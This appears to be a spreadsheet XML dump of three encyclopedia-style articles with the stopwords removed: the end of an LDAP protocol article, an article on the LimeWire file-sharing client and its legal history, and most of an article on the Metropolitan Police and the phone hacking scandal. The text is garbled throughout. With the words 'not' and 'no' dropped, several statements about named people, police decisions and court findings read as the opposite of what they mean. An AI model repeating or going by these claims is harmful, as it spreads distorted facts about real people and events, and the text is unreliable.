keyword. attribute multi-valued, client must specify value attribute update. delete attribute entry, keyword delete changetype designator modify. attribute multi-valued, client must specify value attribute delete. there also modify-increment extension allows incrementable attribute value incremented specified amount. following example using ldif increments employeenumber uid=user.0,ou=people,dc=example,dc=com changetype: modify increment: employeenumber employeenumber: when ldap servers replicated topology, ldap clients consider using post-read control verify updates instead search update. post-read control designed applications need issue search request update form retrieve entry sole purpose checking update worked replication eventual consistency model. ldap client assume connects directory server request architects placed load-balancers ldap proxies ldap clients servers. modify modify (move/rename entry) takes (relative distinguished name), optionally parent's flag indicates whether delete value(s) entry match rdn. server support renaming entire directory subtrees. update operation atomic: other operations either entry one. hand, ldap define transactions multiple operations: read entry modify another client updated entry meantime. servers implement extensions support this, though. extended operations extended operation generic ldap operation define operations part original protocol specification. starttls significant extensions. other examples include cancel password modify. starttls starttls operation establishes transport layer security (the descendant ssl) connection. provide data confidentiality protect data observed third parties) and/or data integrity protection (which protects data tampering). during negotiation server sends x.509 certificate prove identity. client also send certificate prove identity. after client sasl/external. using sasl/external, client requests server derive identity credentials provided lower level (such tls). though technically server identity information established lower level, typically server identity information established tls. servers also often support non-standard "ldaps" ("secure ldap", commonly known "ldap ssl") protocol separate port, default 636. ldaps differs ldap ways: upon connect, client server establish ldap messages transferred (without starttls operation) ldaps connection must closed upon closure. some "ldaps" client libraries encrypt communication; check host name name supplied certificate. abandon abandon operation requests server abort operation named message server need honor request. neither abandon successfully abandoned operation send response. similar cancel extended operation send responses, implementations support this. unbind unbind operation abandons outstanding operations closes connection. response. name historical origin, opposite bind operation.clients abort session simply closing connection, unbind. unbind allows server gracefully close connection free resources would otherwise keep time discovering client abandoned connection. also instructs server cancel operations canceled, send responses operations cannot canceled. scheme ldap uniform resource identifier (uri) scheme exists, clients support varying degrees, servers return referrals continuation references (see 4516): ldap://host:port/dn?attributes?scope?filter?extensions most components described optional. host fqdn address ldap server search. port network port (default port 389) ldap server. distinguished name search base. attributes comma-separated list attributes retrieve. scope specifies search scope "base" (the default), "one" "sub". filter search filter. example, (objectclass=*) defined 4515. extensions extensions ldap format.for example, "ldap://ldap.example.com/cn=john%20doe,dc=example,dc=com" refers user attributes john doe's entry ldap.example.com, "ldap:///dc=example,dc=com??sub?(givenname=john)" searches entry default server (note triple slash, omitting host, double question mark, omitting attributes). urls, special characters must percent-encoded. there similar non-standard ldaps scheme ldap ssl. this confused ldap tls, achieved using starttls operation using standard ldap scheme. schema contents entries subtree governed directory schema, definitions constraints concerning structure directory information tree (dit). schema directory server defines rules govern kinds information server hold. number elements, including: attribute syntaxes—provide information kind information stored attribute. matching rules—provide information make comparisons attribute values. matching rule uses—indicate attribute types used conjunction particular matching rule. attribute types—define object identifier (oid) names refer given attribute, associates attribute syntax matching rules. object classes—define named collections attributes classify sets required optional attributes. name forms—define rules attributes included entry. content rules—define additional constraints object classes attributes used conjunction entry. structure rule—define rules govern kinds subordinate entries given entry have.attributes elements responsible storing information directory, schema defines rules attributes used entry, kinds values attributes have, clients interact values. clients learn schema elements server supports retrieving appropriate subschema subentry. schema defines object classes. each entry must objectclass attribute, containing named classes defined schema. schema definition classes entry defines kind object entry represent e.g. person, organization domain. object class definitions also define list attributes must contain values list attributes contain values. example, entry representing person might belong classes "top" "person". membership "person" class would require entry contain "sn" "cn" attributes, allow entry also contain "userpassword", "telephonenumber", attributes. since entries multiple objectclasses values, entry complex optional mandatory attribute sets formed union object classes represents. objectclasses inherited, single entry multiple objectclasses values define available required attributes entry itself. parallel schema objectclass class definition instance object-oriented programming, representing ldap objectclass ldap entry, respectively. directory servers publish directory schema controlling entry base given entry's subschemasubentry operational attribute. operational attribute describes operation directory rather user information returned search explicitly requested.) server administrators additional schema entries addition provided schema elements. schema representing individual people within organizations termed white pages schema. variations server operation left implementor administrator decide. accordingly, servers support wide variety scenarios. example, data storage server specified server flat files, databases, gateway server. access control standardized, though work commonly used models. users' passwords stored entries elsewhere. server refuse perform operations wishes, impose various limits. most parts ldap extensible. examples: define operations. controls modify requests responses, e.g. request sorted search results. search scopes bind methods defined. attributes options modify semantics. other data models ldap gained momentum, vendors provided access protocol services. implementation recasts data mimic ldap/x.500 model, closely model followed varies. example, software access databases ldap, even though ldap readily lend this. x.500 servers support ldap well. similarly, data previously held types data stores sometimes moved ldap directories. example, unix user group information stored ldap accessed modules. ldap often used services authentication and/or authorization (what actions given already-authenticated user service). example active directory kerberos used authentication step, ldap used authorization step. example data model glue schema, used distributed information system based ldap enable users, applications services discover services exist grid infrastructure information structure state. usage ldap server return referrals servers requests cannot fulfill itself. this requires naming structure ldap entries find server holding given distinguished name (dn), concept defined x.500 directory also used ldap. another locating ldap servers organization server record (srv). organization domain example.org level ldap dc=example,dc=org (where means domain component). ldap server also named ldap.example.org, organization's level ldap becomes ldap://ldap.example.org/dc=example,dc=org. primarily common styles naming used x.500 [2008] ldapv3. these documented specifications ietf rfcs. original form takes level object country object, c=us, c=fr. domain component model uses model described above. example country based naming could l=locality, ou=some organizational unit, o=some organization, c=fr, cn=common name, l=locality, ou=some organizational unit, o=some organization, st=ca, c=us. also ambiguous name resolution ccso nameserver federated naming service hesiod (name service) hierarchical database model server (cryptographic) ldap application program interface list ldap software simple authentication security layer (sasl) references sources itu-t rec. x.680, "abstract syntax notation (asn.1) specification basic notation", 1994 basic encoding rules (ber) itu-t rec. x.690, "specification asn.1 encoding rules: basic, canonical, distinguished encoding rules", 1994 3641 generic string encoding rules (gser) asn.1 types 4346 protocol version 4422 simple authentication security layer (sasl) sasl mechanisms registered iana further reading arkills, (2003). ldap directories explained: introduction analysis. addison-wesley professional. isbn 978-0-201-78792-4. carter, (2003). ldap system administration. o'reilly media. isbn 978-1-56592-491-8. donley, (2002). ldap programming, management, integration. manning publications. isbn 978-1-930110-40-3. howes, smith, good, (2003). understanding deploying ldap directory services. addison-wesley professional. isbn 978-0-672-32316-4. rhoton, (1999). programmer's guide internet mail: smtp, pop, imap, ldap. elsevier. isbn 978-1-55558-212-8. voglmaier, (2003). abcs ldap: install, run, administer ldap services. auerbach publications. isbn 978-0-8493-1346-2. external links list public ldap servers (2013): "ldapwiki: public ldap servers". ldapwiki.com. 2013. retrieved 2020-01-18.</t>
  </si>
  <si>
    <t>LimeWire</t>
  </si>
  <si>
    <t>limewire music-based platform originally free software peer-to-peer file sharing (p2p) client windows, linux solaris. limewire uses gnutella network well bittorrent protocol. zero-cost version purchasable "enhanced" version (called limewire pro) available; limewire could acquired regular limewire software without payment, users distributed software without authorization. bittorrent support provided libtorrent. company joint venture original limewire team zehetmayr brothers (due limewire still owning assets licensing limewire name zehetmayr brothers despite affiliation them.) october 2010, u.s. federal court judge kimba wood issued injunction ordering limewire prevent "the searching, downloading, uploading, file trading and/or file distribution functionality, and/or functionality" software arista records lime group llc. trial investigating damages necessary compensate affected record labels scheduled begin january 2011. result injunction, limewire stopped distributing limewire software, versions 5.5.11 newer disabled using backdoor installed company. however, version 5.5.10 prior versions limewire remain fully functional cannot disabled unless user upgrades newer versions. program "resurrected" creators wireshare (formerly known limewire pirate edition). features written java programming language, limewire computer java virtual machine installed. installers provided apple's microsoft's windows, linux. support previous versions dropped release limewire 4.0.10. from version onwards, limewire works upnp internet gateway device controller automatically packet-forwarding rules upnp-capable routers. limewire offers sharing library digital audio access protocol (daap). such, limewire running configured allow files shared detectable downloaded local network daap-enabled devices (e.g., zune, itunes). beginning limewire 4.13.9, connections encrypted transport layer security (tls). following limewire 4.13.11, became default connection option. version history until october 2010, lime wire llc, york city based developer limewire, distributed versions program: basic gratis version, enhanced version, limewire pro, sold $21.95 months updates, around $35.00 year updates. company claimed paid version provides faster downloads better search results. this accomplished facilitating direct connection hosts identical searched file time, whereas gratis version limited maximum hosts. being free software, limewire spawned forks, including lionshare, experimental software development project penn state university, acquisition, x-based gnutella client proprietary interface. researchers cornell university developed reputation management add-in called credence allows users distinguish "genuine" "suspect" files downloading them. october 2005, report states limewire's contributors forked project called frostwire.limewire second file sharing program frostwire support firewall-to-firewall file transfers, feature introduced version 4.2, released november 2004. limewire also includes bittorrent support, limited three torrent uploads three torrent downloads, coexist ordinary downloads. limewire added instant messenger uses xmpp protocol, free software communication protocol. users chat share files individuals group friends buddy list. from version 5.5.1, limewire added activation, requires user enter unique activating "pro" version software. this stopped people using downloaded "pro" versions without authorisation. however, still ways bypass security feature, done creating "pirate edition". example, cracked versions limewire available internet (including limewire itself), people could continue using limewire 5.5.1 beta, also includes limewire first version include avg. recent stable version limewire 5.5.16. versions limewire prior 5.5.10 still connect gnutella network users versions still able download files, even though message displayed concerning injunction startup process software. limewire versions 5.5.11 newer feature auto-update feature allowed lime wire disable newer versions limewire software. older versions limewire prior version 5.5.11, however, include auto-update feature still fully functional. result, neither recording industry association america (riaa) lime wire ability disable older versions limewire, unless user chooses upgrade newer version limewire.on november 2010, secret group developers called "secret team" sought keep application working releasing "limewire pirate edition". software based limewire beta, aimed allow windows versions still work remove threat spyware adware. exclusive features limewire also unlocked, security features installed lime wire removed. forks alternatives number forks limewire released, goal giving users freedom, objecting decisions made lime wire disagreed with. frostwire frostwire started september 2004 members limewire community, limewire's distributor considered adding "blocking" code, response riaa pressure threat legal action, light u.s. supreme court's decision studios, inc. grokster, ltd.. when eventually activated, code could block users sharing licensed files. this code recently changed lawsuits filed limewire downloading. blocked users redirected frostwire. frostwire since completely moved bittorrent protocol gnutella (limewire's file sharing network). limewire pirate edition/wireshare november 2010, response legal challenges regarding limewire, anonymous individual handle meta pirate released modified version limewire pro, entitled limewire pirate edition. came without ask.com toolbar, advertising, spyware, backdoors, well dependencies lime wire servers.in response allegations current former member lime wire staff wrote released software, company stated "not behind efforts. limewire authorize them. limewire complying court's october 2010 injunction."the limewire team, accused riaa complicit development limewire pirate edition, swiftly acted shut limewire pirate edition website. court order issued close website, and, remain anonymous, meta pirate, developer limewire contest order.following shutdown, original limewire project reforked wireshare, intent keep gnutella network alive maintain good faith continuation original project (without adware spyware); development software continues day. muwire around 2020, another free software program resembling limewire called muwire released; uses anonymise connections transfers. criticism prior april 2004, free version limewire distributed bundled program called limeshop variant topmoxie), spyware. among things, limeshop monitored online purchases order redirect sales commissions lime wire llc. uninstallation limewire would remove limeshop. with removal bundled software limewire 3.9.4 (released april 2004), objections addressed. limewire currently facility allows server contact running limewire client gather various information.in limewire versions 5.0, users could accidentally configure software allow access file computer, including documents personal information. recent versions limewire allow unintentional sharing documents applications. 2005, federal trade commission issued warning regarding dangers using peer-to-peer file sharing networks, stating using networks lead identity theft lawsuits.an identity theft scheme involving limewire discovered denver 2006. september 2007, gregory thomas kopiloff seattle arrested u.s. justice department described first case someone accused using file sharing computer programs commit identity theft. according federal prosecutors, kopiloff used limewire search people's computers inadvertently shared financial information used obtain credit cards online shopping spree.one investigation showed randomly selected downloaded files, contained malware 30%. mid-2008, macintosh trojan exploiting vulnerability involving apple remote desktop distributed limewire affecting users tiger leopard. ability distribute malware viruses also reduced versions limewire greater, program defaulting share search executable files. 2009, industry spokesman represented lime wire others u.s. house representatives legislative hearing h.r. 1319, "the informed user act".on february 2010, limewire reversed previous anti-bundling stance announced inclusion ask.com-powered browser toolbar users explicitly opt-out prevent installation. toolbar sends bittorrent searches ask.com, limewire searches instance limewire user's machine. limewire automatically receives cryptographically signed file, called simpp.xml, containing block list. technology behind defunct cyber security firm tiversa alleged used information network pressure prospective clients engaging company's services. injunction according june 2005 report york times, lime wire considering ceasing distribution limewire outcome grokster "handed tool judges declare inducement whenever want to".on 2010, judge kimba wood united states district court southern district york ruled arista records lime group limewire creator, mark gorton, committed copyright infringement, engaged unfair competition, induced others commit copyright infringement. october 2010, limewire ordered disable "searching, downloading, uploading, file trading and/or file distribution functionality" losing court battle riaa claims copyright infringement. riaa also announced intentions pursue legal action damages caused program january compensate affected record labels. retaliation, riaa's website taken offline october denial-of-service attacks executed members operation payback anonymous.in response ruling, company spokesperson said company shutting down, "best efforts" cease distributing supporting software.in early 2011, riaa announced intention limewire, pursuing statutory damages theory claimed trillion damages greater entire global economy time. there currently around 11,000 songs limewire tagged copyright-infringed, riaa estimates downloaded thousands times, penalties accruing sum.a trial decide eventual amount damages owed limewire thirteen record labels, including warner music group sony music, represented riaa, started early went 2011, gorton agreed record companies $105 million out-of-court settlement. mitch bainwol, chairman riaa, referred "resolution case [as] another milestone continuing evolution online music legitimate marketplace appropriately rewards creators." reuse trademark march 2022, brothers paul julian zehetmayr announced would revive limewire music-based platform, licensing original limewire team. marketplace launched july 2022, first collection american record producer rapper aurelius. marketplace affiliation limewire’s original team. mark gorton expressed displeasure reuse limewire name way. also comparison file sharing applications open music model similar court rulings allofmp3 grooveshark kazaa mininova megaupload napster references sources shuman ghosemajumder (2002). advanced peer-based technology business models (thesis). sloan school management. hdl:1721.1/8438. sean silverthorne (2004). "music downloads: pirates- customers?". harvard business school working knowledge. external links alternatives limewire (2012), zeropaid.com limewire resurrected secret team (2010), torrentfreak</t>
  </si>
  <si>
    <t>Metropolitan Police role in the news media phone hacking scandal</t>
  </si>
  <si>
    <t>this article provides narrative beginning 1999 investigations metropolitan police service (met) greater london illegal acquisition confidential information agents collaboration news media commonly referred phone hacking scandal. article discusses seven phases investigations several investigations itself, including critiques responses regarding met's performance. separate articles provide overview scandal comprehensive reference lists detailed background information. 2002, practice news media organizations using private investigators ("law enforcement") acquire confidential information widespread. some individuals used illegal methods accomplish this. victims illegal phone hacking included celebrities, politicians, enforcement officials, solicitors, ordinary citizens. illegal activity became apparent, suspects arrested convicted crimes. some victims retained solicitors upon learning privacy violated, filed suit news media companies agents. some victims received financial payments violation privacy. successful suits publicity investigative news articles disclosures, including names victims, documentary evidence wrongdoing, admissions wrongdoing news media agents, payments potentially related scandal. allegations made poor judgement cover-up news media executives enforcement officials. result, additional investigations illegal acquisition confidential information initiated several senior executives police officials forced resign. there also significant commercial consequences scandal. contemporary commentators made comparisons watergate scandal. metropolitan police conducted several investigations 1999 2011. first three investigations, involving phone taps seizure records, successfully gathered large quantities evidence confidential information acquired illegally, sometimes help public officials including policemen. 2006, seven found guilty, arrests made 2011. criticized aggressively pursuing significant leads available evidence, adequately informing individuals victims phone hacking, allegedly misleading public parliament scope problem. while continuing investigate illegal acquisition confidential information, became object several investigations diligence probes possible involvement personnel illegal activities. after scope phone hacking scandal became generally known july 2011, officials resigned. leadership augmented ongoing investigations unusual measure bringing independent police organization help. mid-july 2011, many separate investigations active met, parliament government agencies. investigations metropolitan police operation nigeria (1999) from least 1990s, private investigator jonathan rees reportedly bought information former serving police officers, customs officers, inspector, bank employees, burglars, blaggers would telephone inland revenue, driving vehicle licensing agency (dvla), banks phone companies, deceiving providing confidential information. sold information news world, daily mirror, sunday mirror sunday times. news world alone paid rees £150,000 year.in response, rees also suspected 1987 murder former partner, met's anti-corruption squad cib3 operation nigeria. involved tapping rees' phone agency, southern investigations, april september 1999 obtain evidence murder whether confidential information acquired illegally police and/or reporters. recorded telephone conversations revealed alex marunchak news world regular customer agency. determined rees purchasing information improper sources, evidence became public marunchak journalists committed criminal offences aware rees acquired information. bugging operation ended learned rees planning plant drugs woman husband, rees' client, could custody child. rees others whose voices recorded operation nigeria (including austin warnes, duncan hanrahan, martin king, kingston, fillery) successfully prosecuted sentenced jail various offenses unrelated illegal acquisition confidential information.rees another private investigator, fillery, later became rees' partner southern investigations, suspicion 1987 murder daniel morgan, another private investigator rees' partner time murder. morgan's family claimed morgan planning article expose police corruption. met's officers investigating murder charges, detective chief superintendent david cook, warned surrey police scotland yard become surveillance target fillery. fillery reportedly used relationship alex marunchak arrange glenn mulcaire, work news world, obtain cook's home address, internal payroll number metropolitan police, date birth figures amount wife paying mortgage. surveillance cook also reported involved physically following young children, attempts access voicemail wife, possibly attempts send "trojan horse" email attempt steal information computer. paperwork reportedly possession scotland yard shows "mulcaire instructions greg miskiw, paper's assistant editor close friend marunchak." when vans parked outside cook's home stopped officers, driver turned photojournalist news world. vans also licensed newspaper. during week, appeared attempts made open letters left cook's external postbox, indicating "possible attempt pervert course justice."the handled apparent attempt agents news world interfere murder inquiry informal discussions rebekah brooks, editor news world. "scotland yard took action, apparently reflecting desire dick fedorcio, close working relationship brooks, avoid unnecessary friction news world." fedorico director public affairs internal communication met. july 2011, cook wife believed preparing legal action news world, marunchak, miskiw mulcaire. marunchak also identified news world executive arranged someone plant trojan computer former british intelligence nco, hurst. 2000, rees sentenced seven years prison served five. upon release 2005, resumed private investigative work news world, andy coulson time succeeded rebekah brooks editor. coulson maintained evidence given parliament oath court know anything illegal activity seven years spent near news world.no charged illegal acquisition confidential information result operation nigeria. according nick davies, reporter guardian, collected hundreds thousands documents investigations jonathan rees links corrupt officers alleged murder daniel morgan. although charges murder rees dismissed 2011, davies believes "boxloads" paperwork "could include explosive evidence illegal news-gathering news world papers." operation glade (2003) years, private investigators addition rees plying lucrative trade illegally acquired confidential information. specialty john boyall's agency, liberty resources intelligent research limited, acquiring information confidential databases. boyall's assistant glenn mulcaire autumn 2001, news world's assistant editor, greg miskiw, attracted mulcaire away giving full-time contract work newspaper.boyall eventually attracted attention information commissioner's office (ico), police organization independent authority mandate "uphold information rights public interest, promoting openness public bodies data privacy individuals."with assistance devon cornwall police, raided boyall's premises november 2002. documents seized another private investigator, steve whittamore, who, wife, information limited. march 2003, whittamore's premises raided dubbed operation motorman. documents raid established confidential information illegally acquired telephone companies, driving vehicle licensing agency (dvla) police national computer. reported "media, especially newspapers, insurance companies local authorities chasing council arrears appear sales ledger dodgy agency." prices clearly established: "ex-directory telephone numbers cost hampshire detective £40, sold £70. vehicle check cost £70, customers charged £150. on."in 2006, issued report titled "what price privacy?" afterward, received request freedom information "for information publications journalists employed breakdown activity." some information provided requester, follow-up report issued december 2006 titled "what price privacy now?"" however, much information obtained operation motorman never released public. recently september 2011, declined release information another freedom information request.many people involved illegal trafficking confidential information. paul marshall, former civilian communications officer based tooting police station london, provided confidential police information alan king, retired police officer, passed along boyall, gave whittamore, turn sold agents news media organizations. whittamore's network information gatherers gave access confidential records telephone companies, banks, post offices, hotels, theatres, prisons, including group, crédit lyonnais, goldman sachs, hang seng bank, glen parva prison, stocken prison. although evidence many people engaged illegal activity, relatively questioned. operation motorman's lead investigator said 2006 inquiry "his team told interview journalists involved. investigator...accused authorities 'frightened' tackle journalists."learning whittamore obtaining information police national computer, information commissioner contacted metropolitan police, headed commissioner blair deputy commissioner paul stephenson second command. response, met's anti-corruption unit initiated operation glade.whittamore kept detailed records transactions clients, including news world. identified different journalists commissioning work well half news feature writers paper, spending tens thousands pounds. news world's greg miskiw alone recorded making requests." invoices submitted news international, owned news world, "sometimes made explicit reference obtaining target's details phone number vehicle registration." miskiw reportedly questioned whether paid cash boyall obtain information police computer, charges made.between february 2004 april 2005, crown prosecution service, headed macdonald, charged working private detective agencies crimes relating illegal acquisition confidential information. journalists charged. whittamore, boyall, king, marshall pleaded guilty april 2005. according head richard thomas, "each pleaded guilty yet, despite extent frequency admitted criminality, conditionally discharged [for years], raising important questions public policy." following year john gunning convicted acquiring private subscriber information british telecom's database.according nick davies guardian, illegal acquisition limited rich powerful prosecution inadequate.documents seized stephen whittamore's home 2003 included "more 13,000 requests confidential information newspapers magazines." there indication significant portion evaluated police potential evidence persons. february 2011, justice geoffrey ordered disclosure material response phone hacking claim brought politician george galloway, significant release seized material made. royal household goodman inquiry (2006) november 2005, within months guilty pleas resulting operation glade, metropolitan police service notified irregularities telephone voicemails members royal household. january 2006, scotland yard determined "unambiguous trail" clive goodman, news world royal reporter, glenn mulcaire, private investigator contracted work paper." voicemail royal aide accessed times.the met's counter-terrorism group, assistant commissioner andy hayman, responsibility security royal family charged making investigation. there concern diverting resources effort demands priorities, including following 2005 london transit bombings surveillance operations possible bomb plotters.on august 2006, detectives went news world search warrant search clive goodman's desk. they reportedly faced resistance newspaper's lobby executives lawyers paper searching newsroom veteran reporters stuffed documents trash bags removed them. happened, detectives limited search goodman's desk.at time, police raided home glenn mulcaire seized "11,000 pages handwritten notes listing nearly 4,000 celebrities, politicians, sports stars, police officials crime victims whose phones hacked." names included eight members royal family staff. there "dozens notebooks computers containing 2,978 complete partial mobile phone numbers codes; least three names news world journalists; tape recordings made mulcaire. upper-left-hand corner document page name reporter editor mulcaire helping. also seized recording mulcaire instructing journalist hack private voice mail, particularly easy phone's factory settings privacy changed.the records also included transcript voice mail messages professional football association's gordon taylor legal adviser, anderson. this document titled "transcript neville" alleged neville thurlbeck, another reporter news world. email appeared indicate illegal interception voice mail messages used news world clive goodman. detectives question thurlbeck news world journalist executive part investigation. this part met's relationship press.the met's investigation hayman stayed narrowly focused victims royal household victims short "target list" obtained mulcaire raid. hayman seen acted upon much longer list pages length, single-spaced, "read like british society directory." five victims included indictment mulcaire notified violation privacy. thousands people also victims, decided notify members government, police, military, otherwise national-security concern. politician george galloway notified detective august 2006 voicemail hacked advised change code prevent re-occurrence. galloway asked accessed phone messages, detective refused tell him.hayman's investigation also stayed narrowly focused activities goodman mulcaire. news world executives reporters goodman questioned phone hacking operation weeting initiated four years later.met officials consulted crown prosecution service (cps) headed director public prosecutions (dpp) macdonald best general proceed investigation prosecution. disclose available evidence senior prosecutors time, reportedly omitting documents indicating reporters addition clive goodman appeared using mulcaire's services. appears provided rationale limiting investigation initially advising "phone hacking offence messages intercepted listened intended recipient." fact, hacking illegal 1990 computer misuse regardless whether messages already listened intended recipient even illegal 2000 regulation investigatory powers act. precise nature guidance given became subject public disagreement 2011, time noted, among things, charges brought goodman mulcaire included counts evidence provided regarding whether messages already heard not.goodman mulcaire arrested august 2006. during court proceedings, small number victims mulcaire's phone hacking mentioned, including andrew, clifford, simon hughes, elle macpherson, gordon taylor. november 2006, goodman mulcaire pleaded guilty conspiracy intercept communications without lawful authority respect three royal aides. work metropolitan police resulted guilty pleas within month crimes royal aides committed. however, clear court testimony mulcaire hacked least five phones work goodman.within weeks arrests goodman mulcaire, "senior police officer" reportedly advised rebekah brooks strong circumstantial evidence documents seized mulcaire news world journalists addition goodman implicated phone hacking. early autumn 2006, crone, legal manager news international, reportedly contacted several executives, including news world editor andy coulson, informing told brooks. coulson resigned, accepting responsibility illegal activity, denied knowing it.the documents seized mulcaire raid remained largely unevaluated autumn 2010. news world goodman questioned march 2011. nonetheless, “senior scotland yard officials assured parliament, judges, lawyers, potential hacking victims, news media public evidence widespread hacking tabloid.” according york times, “the police agency news international became intertwined wound sharing goal containing investigation.mary ellen field highly paid adviser elle macpherson. macpherson blamed field confidential information macpherson began appearing news world fired her. after glenn mulcaire arrested jailed, acknowledging hacked macpherson's phone, field wrote police requesting information might help exonerate her. replied. yates review evidence (2009) july 2009, guardian published three articles authored journalist nick davies vikram dodd titled: "murdoch papers paid phone-hacking victims" "trail hacking deceit nose tory chief." "ex-murdoch editor andrew neil: news world revelations significant media stories time."the articles alleged: rupert murdoch's news group newspapers (ngn) agreed large settlements hacking victims, including gordon taylor. settlements included gagging provisions prevent release public evidence held metropolitan police service journalists repeatedly used criminal methods stories. "news group persuaded court seal file taylor's case prevent public access, even though contained prima facie evidence criminal activity." that evidence included documents seized raids information commissioner's office met. suppressed evidence became public, hundreds phone hacking victims might position take legal action newspapers including news world sun. might also provoke police inquiries reporters senior newspaper executives. when andy coulson, chief press adviser prime minister david cameron, editor deputy editor news world, journalists openly engaged private investigators used illegal phone hacking, paying invoices work itemised illegal acts. neil also said everybody news world knew going public interest defense phone hacking, case pursued raises serious questions metropolitan police, crown prosecution service, court which, "faced evidence conspiracy systemic illegal actions,...agreed seal evidence." held evidence thousands mobile phones hacked agents news world, including members parliament three parties including cabinet ministers. metropolitan police decided inform public figures whose phones targeted crown prosecution service decided prosecute news group executives. statements executives misled parliamentary select committee, press complaints commission public extent newspaper's illegal acquisition confidential information.later day, metropolitan police service commissioner paul stephenson asked assistant commissioner john yates take fresh look phone hacking reopened light allegations. yates reportedly took eight hours consult senior detectives crown prosecution lawyers conclude fresh material could lead convictions. review include examination possible leads thousands pages available evidence seized raids 1999 2006.in september 2009, yates reported conclusions commons culture, media sport committee saying insufficient evidence arresting even interviewing anyone else additional evidence brought forward. upon review first inquiry, concluded handful, hundreds, thousands potential victims. although yates aware "transcript neville" email fresh look, believe would worthwhile interview neville thurlbeck. further, yates believe would worthwhile interview journalists news world glenn mulcaire worked look cases victims beyond eight pursued 2006.eventually, queries continued come celebrities politicians asking victims hacking, yates directed evidence mulcaire raid stored trash bags three years entered computer database. people assigned task. yates look evidence saying later, “i'm going look bags. supposed assistant commissioner." re-open investigation. operation weeting (2011): interception voicemail some individuals become aware voicemail messages intercepted glenn mulcaire news world initiated legal action mulcaire newspaper. progress suits evidence released courts consequence received public scrutiny guardian newspapers kept story public view. 2005, mark lewis, solicitor professional footballers' association, suspected news world hacked phones information proposed story concerning gordon taylor. beliefs confirmed late 2007 mulcaire's judicial proceedings, mulcaire pleaded guilty apologized taylor seven others accessing voicemail messages. lewis sued news world behalf taylor, filed actions court obtain relevant documents. result, june 2008, court ordered documents held metropolitan police obtained raids mulcaire steve whittamore turned lewis. documents "transcript neville" email. within hours, news world began settlement discussions. taylor received £700,000, lewis became first solicitor settlement newspaper phone hacking.the settlement remained secret reported guardian july 2009 three articles relating phone hacking published day. days later, clifford, another eight victims named 2006 indictment mulcaire, announced intentions sue. march 2010, news international agreed settle suit £1,000,000. these awards encouraged possible victims solicitors explore possibilities, resulting queries metropolitan police whether names mulcaire's lists. responses difficult obtain. solicitor charlotte harris, represented clifford, wrote metropolitan police clients, leslie husband chapman, "asking whether also hacked. police took three months reply."on july 2009, shortly guardian articles published, stuart kuttner resigned news world. managing editor.the commons culture, media sport committee begun holding hearings phone hacking beginning march 2007, shortly goodman mulcaire sent prison. these hearings renewed july 2009, shortly guardian's three articles published. after taking testimony police several news international representatives, committee's released findings february 2010. committee critical police pursuing "evidence merited wider investigation" criticized news international executives “collective amnesia.” hearings result renewed police investigation, enthusiasm scotland yard beyond mulcaire goodman.on september 2010, york times published lengthy article natta jr., becker, graham bowley echoing committee's concerns specifically contradicting testimony made former news world editor andy coulson claimed aware phone hacking. among things, article alleged: failed follow leads indicated news world routinely used phone hacking leads stories. several investigators said "was reluctant conduct wider inquiry part close relationship news world." former editor andy coulson, communications director prime minister david cameron, fully aware phone hacking used newspaper's journalists even encouraged it.on december 2010, guardian published article authored nick davies disclosing documents, seized home private investigator glenn mulcaire metropolitan police service 2006 recently made available public court action, implied news world editor edmondson specifically instructed mulcaire intercept voice messages sienna miller, jude law, several others. documents also implied mulcaire engaged others news world, including chief reporter neville thurlbeck assistant editor greg miskiw, worked directly editor andy coulson. this contradicted testimony culture, media sport committee newspaper executives senior officials mulcaire acted evidence hacking single "rogue reporter," namely clive goodman. within five weeks article appearing, edmundson suspended news world, andy coulson resigned chief press secretary david cameron, crown prosecution service began review evidence had, renewed investigation phone hacking, something declined since 2007.the renewed investigation titled operation weeting began january 2011. akers, deputy assistant commissioner metropolitan police, focused illegal interception voicemail. between officers began looking 11,000 pages evidence seized mulcaire back august 2006. mid-april, thurlbeck, edmondson, james weatherup, senior news world journalist, arrested. 2011, news international's firm, hickman rose, hired former director public prosecutions macdonald review emails newspaper executives used basis claim news world clive goodman involved phone hacking. macdonald immediately concluded evidence criminal activity, including payments serving police officers, leading open investigation focused bribery corruption within ranks. (see discussion operation elveden, below.) july 2011, guardian published article authored nick davies amelia hill titled "missing milly dowler's voicemail hacked news world." this article disclosed voicemail messages milly dowler's phone hacked back 2002 agent news world looking story. this disclosure inflamed public opinion loss advertising news world subsequent closure 168-year-old newspaper. within weeks, senior news corporation executives resigned, including hinton, chief executive jones company, rebekah brooks, chief executive news international, crone, legal manager news international, lawrence jacobs, general counsel news corporation. also within weeks, officials metropolitan police service resigned, namely commissioner paul stephenson assistant commissioner john yates.the commissioner, bernard hogan-howe, took unusual step asking team outside police force, durham constabulary headed stoddart, review work operation weeting.between july early september 2011, people, mostly editors journalists time worked news world, arrested conjunction illegal acquisition confidential information. these included rebekah brooks, andy coulson, neil wallis, stuart kuttner, greg miskiw, james desborough, evans, ross hall, times deputy editor raoul simons.on september 2011, independent published article authored james cusick cahal milmo reporting that, within weeks arrests clive goodman glenn mulcaire august 2006, senior police officer" advised rebekah brooks substantial "circumstantial evidence" documents seized mulcaire news world journalists addition goodman implicated phone hacking. also reported early autumn 2006, crone, legal manager news international, contacted several executives, including news world editor andy coulson, informing told brooks. news international executives, including crone, maintained aware evidence almost years later, 2008, received copy "transcript neville" conjunction gordon taylor's lawsuit.on 2012, crown prosecution service (cps) charged individuals conspiring pervert course justice. charged relation removal documents computers conceal investigating detectives former news international rebekah brooks, husband, personal assistant, bodyguard, chauffeur, head security news international. these charges made year metropolitan police service reopened dormant investigation phone hacking, years assistant commissioner metropolitan police service told commons culture, media sport committee additional evidence come light," years news international executives began claiming phone hacking work single "rogue reporter, years guardian began reporting evidence widespread illegal acquisition confidential information, years began accumulating "boxloads" evidence kept unexamined trash bags scotland yard.on july 2012, charges brought eight former employees agents news world including head editors rebekah brooks andy coulson. eight charged regarding illegal interception communications relating specific individuals operations tuleta (2011): computer hacking after jonathan rees released prison 2005, resumed private investigative work news world, leadership andy coulson. documents seized part ongoing investigation rees murder daniel morgan included july 2006 containing extracts hurst's emails sent rees news world's dublin office included information "stakeknife". hurst contact stakeknife. marunchak editor newspaper's irish edition.at time, martin ingram, hurst, british army intelligence sergeant northern ireland falsely claimed responsibility contact agent "stakeknife," reportedly double agent imbedded provisional potentially high risk assassination. very people knew agent's whereabouts, kept secret protection. hurst's personal computer allegedly hacked marunchak trojan programme copied emails relayed hacker turn passed along newspaper personnel, putting agent risk.no apparent investigative action taken time documentary evidence computer hacking came possession june 2011, operation tuleta launched. like operation weeting, tuleta met's akers. hurst stated notified 2006 hacking july 2011. operation elveden (2011): 